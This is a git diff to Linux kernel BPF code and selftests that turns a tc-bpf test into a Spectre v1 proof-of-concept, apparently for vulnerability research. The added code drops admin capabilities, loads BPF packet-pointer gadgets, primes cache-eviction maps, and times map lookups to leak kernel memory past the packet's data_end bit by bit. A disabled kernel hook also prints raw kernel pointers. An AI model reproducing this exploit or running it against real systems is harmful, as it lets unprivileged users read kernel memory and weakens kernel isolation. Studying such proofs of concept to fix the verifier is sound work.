diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 382c7a71f81f2d4ce63d3321e584e7ea3cd9218e..ef36ebca3b1123de8309889838e024cd5212b741 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -99,6 +99,28 @@ TC_INDIRECT_SCOPE int cls_bpf_classify(struct sk_buff *skb,
 			__skb_push(skb, skb->mac_len);
 			bpf_compute_data_pointers(skb);
 			filter_res = bpf_prog_run(prog->filter, skb);
+
+#if 0
+			// Print after program to not mess with the cache.
+			static atomic_t init = ATOMIC_INIT(0);
+			if (unlikely(skb_headlen(skb) == 170 && atomic_inc_return(&init) == 1)) {
+				barrier_nospec();
+				struct bpf_skb_data_end *cb = (struct bpf_skb_data_end *)skb->cb;
+				pr_err_ratelimited(
+					"skb = %px, skb_headlen(skb) = %d\n"
+					"data *(%px) = %px\n"
+					"data_end *(%px) = %px\n"
+					"kernel skb_shinfo(skb)->frags[0].bv_page\n\t*(%px ?= data+366 = %px) = %px\n",
+					skb, skb_headlen(skb),
+					&(skb->data), skb->data,
+					&(cb->data_end), cb->data_end,
+					&skb_shinfo(skb)->frags[0].bv_page,
+					((char *) skb->data) + 366,
+					skb_shinfo(skb)->frags[0].bv_page
+				);
+			}
+#endif
+
 			__skb_pull(skb, skb->mac_len);
 		} else {
 			bpf_compute_data_pointers(skb);
diff --git a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
old mode 100644
new mode 100755
index 48b55539331ee54130aa37e2b6103634d24c4d10..ec82e95895b52bdb12e320e8d2e6094c85f1537d
--- a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
+++ b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
@@ -2,6 +2,8 @@
 
 #include <test_progs.h>
 #include <linux/pkt_cls.h>
+#include <arpa/inet.h>
+#include <sys/socket.h>
 
 #include "cap_helpers.h"
 #include "test_tc_bpf.skel.h"
@@ -395,6 +397,251 @@ void tc_bpf_root(void)
 	test_tc_bpf__destroy(skel);
 }
 
+static void die(char *s)
+{
+	perror(s);
+	exit(1);
+}
+
+#define SERVER "127.0.0.1"
+#define BUFLEN (128 * 1024)
+#define PORT 8888
+
+static int client(struct sockaddr_in *si_other) {
+	static int s = -1;
+	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
+		die("socket");
+	}
+
+	memset((char *) si_other, 0, sizeof(si_other));
+	si_other->sin_family = AF_INET;
+	si_other->sin_port = htons(PORT);
+
+	if (inet_aton(SERVER , &si_other->sin_addr) == 0) {
+		fprintf(stderr, "inet_aton() failed\n");
+		exit(1);
+	}
+
+	return s;
+}
+
+static int server(void) {
+	struct sockaddr_in si_me;
+	int s;
+
+	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
+		die("socket");
+	}
+
+	memset((char *) &si_me, 0, sizeof(si_me));
+
+	si_me.sin_family = AF_INET;
+	si_me.sin_port = htons(PORT);
+	si_me.sin_addr.s_addr = htonl(INADDR_ANY);
+
+	if (bind(s, (struct sockaddr *) &si_me, sizeof(si_me)) == -1) {
+		die("bind");
+	}
+
+	return s;
+}
+
+static int client_ping(int s, struct sockaddr_in *si_other, size_t n) {
+	unsigned int slen = sizeof(*si_other);
+	static char message[BUFLEN] = {};
+	memset(message, 0x37, n);
+
+	if (sendto(s, message, n, 0, (struct sockaddr *) si_other, slen) == -1) {
+		die("sendto()");
+	}
+
+	return 0;
+}
+
+#define CAT(a, b, d, c) a ## b ## d ## c
+#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2)
+
+#define EI_MASK(BYTE, MASK)			\
+	else if (offset == BYTE && mask == MASK) fd = bpf_program__fd(skel->progs.NAME(BYTE, MASK));
+
+#define EI_BYTE(BYTE) \
+	EI_MASK(BYTE, 1) \
+	EI_MASK(BYTE, 2) \
+	EI_MASK(BYTE, 4) \
+	EI_MASK(BYTE, 8) \
+	EI_MASK(BYTE, 16) \
+	EI_MASK(BYTE, 32) \
+	EI_MASK(BYTE, 64) \
+	EI_MASK(BYTE, 128)
+
+static int exploit(struct test_tc_bpf *skel, long long *skipped, long long *total,
+				   long long *t0, long long *t1, int offset, int mask) {
+	DECLARE_LIBBPF_OPTS(bpf_tc_hook, hook, .ifindex = LO_IFINDEX, .attach_point = BPF_TC_INGRESS);
+
+	int fd;
+	if (offset == 350 && mask == 1) fd = bpf_program__fd(skel->progs.pkt_ptr_350_1);
+	EI_BYTE(366)
+	EI_BYTE(367)
+	EI_BYTE(368)
+	EI_BYTE(369)
+	EI_BYTE(370)
+	EI_BYTE(371)
+	EI_BYTE(372)
+	EI_BYTE(373)
+	else {
+		errno = EINVAL;
+		die("mask/offset");
+	}
+
+	DECLARE_LIBBPF_OPTS(bpf_tc_opts, opts, .prog_fd = fd);
+	int ret;
+
+	ret = bpf_tc_hook_create(&hook);
+	ret = ret == -EEXIST ? 0 : ret;
+	if (ret) {
+		errno = -ret;
+		perror("hook create");
+		if (!ASSERT_OK(ret, "bpf_tc_hook_create(BPF_TC_INGRESS)"))
+			goto destroy;
+	}
+
+	ret = bpf_tc_attach(&hook, &opts);
+	if (ret)
+		if (!ASSERT_OK(ret, "bpf_tc_attach"))
+			goto end;
+
+	int ss = server();
+	struct sockaddr_in si_server;
+	int cs = client(&si_server);
+
+	client_ping(cs, &si_server, 16*1024); // make it set bv_page != 0
+
+#define LEAKMAP_ENTRIES (5 * 512)
+
+	for (__u32 i = 0; i < LEAKMAP_ENTRIES; i += 512) {
+		__u32 key = i;
+		__s64 value = -i;
+		ret = bpf_map__update_elem(skel->maps.leakmap,
+								   &key, sizeof(key),
+								   &value, sizeof(value), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "init_leak"))
+				goto end;
+		}
+	}
+
+// for 128KiB L1d, 90MiB L3, 1536-entry sltlb
+#define EVICTMAP_ENTRIES (8 * 128 * 1024)
+	for (__u32 i = 0; i < EVICTMAP_ENTRIES; i += 8) {
+		__u32 index = i / 8;
+		__u32 key = i + (index % 8);
+		__u64 value = i;
+		ret = bpf_map__update_elem(skel->maps.evictmap, &key, sizeof(key), &value, sizeof(value), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "init_evict"))
+				goto end;
+		}
+	}
+
+	long long n = 0;
+#define T 8
+#define N 8
+	long long i;
+	for (i = 0; n < N; i++) {
+		// Branch prediction using PHT will be wrong unless it knows rand().
+		int t = rand() % T;
+		for (int j = 0; j < t; j++) {
+			client_ping(cs, &si_server, 512);
+		}
+		client_ping(cs, &si_server, 128); // + 42 byte header
+
+#define X 4
+		__s64 delta[X];
+		for (size_t j = 0; j < X; j++) {
+			__u32 key[X] = {0, 512, 1536, 1024};
+			ret = bpf_map__lookup_elem(skel->maps.leakmap, &key[j], sizeof(key[j]),
+									   &delta[j], sizeof(delta[j]), 0);
+			if (ret) {
+				if (!ASSERT_OK(ret, "delta lookup"))
+					goto end;
+			}
+			if (delta[j] <= 0) {
+				ASSERT_OK(-1, "delta not written by bpf program");
+			}
+		}
+
+		__u32 key = 2048;
+		__u64 err;
+		ret = bpf_map__lookup_elem(skel->maps.leakmap, &key, sizeof(key), &err, sizeof(err), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "err lookup"))
+				goto end;
+		}
+		static bool first = true;
+		if (err && first) {
+			first = false;
+			ASSERT_OK(-err, "bpf");
+		}
+
+		if (i == 2 * 2 * N) {
+			// reload and retry
+			ret = -1;
+			// fprintf(stderr, "i: timeout after %lld reps\n", i);
+			break;
+		}
+
+		// sometimes everything is still in the cache
+		if (!((delta[3] < delta[2]))) {
+			// fprintf(stderr, "skip: uncached\t%lld, cached\t%lld, 0\t%lld, 1\t%lld\n", delta[2], delta[3], delta[0], delta[1]);
+			continue;
+		}
+
+		if (delta[0] > delta[1])
+			*t0 += 1000;
+		else
+			*t1 += 1000;
+		n++;
+	}
+
+	*skipped += i-n;
+	*total += i;
+
+	if (n > 0) {
+		*t0 /= n;
+		*t1 /= n;
+	}
+
+	__u32 key = 0;
+	__u64 value;
+	int ret2 = bpf_map__lookup_elem(skel->maps.evictmap,
+							   &key, sizeof(key),
+							   &value, sizeof(value), 0);
+	if (ret2) {
+		if (!ASSERT_OK(ret2, "lookup"))
+			goto end;
+	}
+	if (value > i*T) {
+		ASSERT_OK(-1, "BUG value > i*T");
+		goto end;
+	}
+
+end:
+	close(ss);
+	close(cs);
+
+	opts.prog_fd = opts.prog_id = 0;
+	ret2 = bpf_tc_detach(&hook, &opts);
+	if (ret2)
+		ASSERT_OK(ret2, "bpf_tc_detach");
+
+destroy:
+	ret2 = bpf_tc_hook_destroy(&hook);
+	if (ret2)
+		ASSERT_OK(ret2, "bpf_tc_hook_destroy");
+
+	return ret;
+}
+
 void tc_bpf_non_root(void)
 {
 	struct test_tc_bpf *skel = NULL;
@@ -409,11 +656,90 @@ void tc_bpf_non_root(void)
 	if (!ASSERT_OK(ret, "disable_cap_sys_admin"))
 		goto restore_cap;
 
-	skel = test_tc_bpf__open_and_load();
-	if (!ASSERT_OK_PTR(skel, "test_tc_bpf__open_and_load"))
-		goto restore_cap;
+	libbpf_set_print(NULL);
+
+#define O 1
+	for (int k = 0; k < O; k++) {// to test reproducibility
+
+		// Must match generated pkt_ptr programs in test_tc_bpf.c and exploit()
+		// function.
+		__u64 base_byte = 366;
+
+		long long skipped = 0;
+		long long total = 0;
+		long long bad_loads = 0;
+		long long total_loads = 0;
+		__u64 qw = 0;
+
+		for (__u64 byte = 0; byte < 8; byte++) {
+			for (__u64 bit = 0; bit < 8; bit++) {
+
+				long long dmax = INT_MIN;
+				long long dmin = INT_MAX;
+				long long d = 0;
+				long long m = 0;
+#define M 8
+				int j = 0;
+				for (j = 0; true; j++) {
+					total_loads += 1;
+					skel = test_tc_bpf__open_and_load();
+					if (skel) {
+						long long t0 = 0, t1 = 0;
+
+						ret = exploit(skel,
+									  &skipped, &total,
+									  &t0, &t1,
+									  base_byte + byte, 1 << bit);
+						if (ret == -1) {
+							bad_loads += 1;
+							goto cleanup;
+						}
+						if (ret)
+							if (!ASSERT_OK(ret, "exploit"))
+								goto restore_cap;
+
+						if (j == 0) {
+							goto cleanup;
+						}
+
+						long long jd = t0 - t1;
+						dmax = jd > dmax ? jd : dmax;
+						dmin = jd < dmin ? jd : dmin;
+						d += jd;
+						m++;
+					}
+				cleanup:
+					test_tc_bpf__destroy(skel);
+
+					if (j == 64 * M) {
+						fprintf(stderr, "failed to read bit accurately because of too many consecutive bad loads or inconclusive result, will continue anyway");
+						break;
+					}
+
+					// Continue as long as result is inconclusive.
+					if (m >= M && (d / m >= 200 || d / m <= -200)) {
+						break;
+					}
+				}
+
+				d /= m;
+
+				fprintf(stderr, "*(data+%lld):%lld = %lld < avg %lld < %lld (ps), j = %d\n", base_byte + byte, bit, dmin, d, dmax, j);
+
+				// little endian
+				__u64 b = !!(d < 0 ? 0 : 1);
+				qw |= b << ((byte * 8) + bit);
+			}
+		}
+		fprintf(stderr, "userspace guess for *(u64 *)(data+%lld = data_end+%lld) = 0x%llx\n"
+				"\t>%lld percent bad samples; %lld percent bad loads\n",
+				base_byte, base_byte - 42 - 128, qw,
+				(skipped * 100) / total,
+				(bad_loads * 100) / total_loads);
 
-	test_tc_bpf__destroy(skel);
+	}
+
+	ASSERT_OK(-1, "exploit");
 
 restore_cap:
 	if (caps)
diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf.c b/tools/testing/selftests/bpf/progs/test_tc_bpf.c
old mode 100644
new mode 100755
index ef7da419632a2146be37e8a1d271e5d4ac87af29..c5344255ce88eb43241ae4ac6d019e14f03b9b97
--- a/tools/testing/selftests/bpf/progs/test_tc_bpf.c
+++ b/tools/testing/selftests/bpf/progs/test_tc_bpf.c
@@ -4,6 +4,7 @@
 #include <bpf/bpf_helpers.h>
 #include <linux/if_ether.h>
 #include <linux/ip.h>
+#include "bpf_misc.h"
 
 /* Dummy prog to test TC-BPF API */
 
@@ -13,13 +14,74 @@ int cls(struct __sk_buff *skb)
 	return 0;
 }
 
-/* Prog to verify tc-bpf without cap_sys_admin and cap_perfmon */
-SEC("tcx/ingress")
-int pkt_ptr(struct __sk_buff *skb)
-{
-	struct iphdr *iph = (void *)(long)skb->data + sizeof(struct ethhdr);
+/* pkt-ptr-based Spectre v1 gadget */
 
-	if ((long)(iph + 1) > (long)skb->data_end)
-		return 1;
-	return 0;
+#define LEAKMAP_ENTRIES (5 * 512)
+
+struct {
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, LEAKMAP_ENTRIES);
+	__type(key, __u32);
+	__type(value, __u64);
+} leakmap SEC(".maps");
+
+#define L1_SIZE_KiB 128
+#define SIZEOF_CACHELINE 64
+#define EVICTMAP_ENTRIES (8 * 128 * 1024)
+
+struct {
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, EVICTMAP_ENTRIES);
+	__type(key, __u32);
+	__type(value, __u64);
+} evictmap SEC(".maps");
+
+static long callback_fn(__u32 index, void *ctx) {
+// sizeof(u64) * 8 is one 64-byte cacheline
+	__u32 key = index * 8 + (index % 8);
+	__u64 *value = bpf_map_lookup_elem(&evictmap, &key);
+	if (value) {
+		*value += 1;
+		return 0;
+	}
+	return 1;
 }
+
+#define STRINGIFY(x) #x
+#define TOSTRING(x) STRINGIFY(x)
+#define CAT(a, b, d, c) a ## b ## d ## c
+#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2)
+
+#define OFFSET 350
+#define MASK 1
+#include "test_tc_bpf_pkt_ptr.h"
+#undef OFFSET
+#undef MASK
+
+// 366 = PAYLOAD + 42 + 196 with PAYLOAD=128
+#define OFFSET 366
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 367
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 368
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 369
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 370
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 371
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 372
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 373
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+
+char LICENSE[] SEC("license") = "GPL";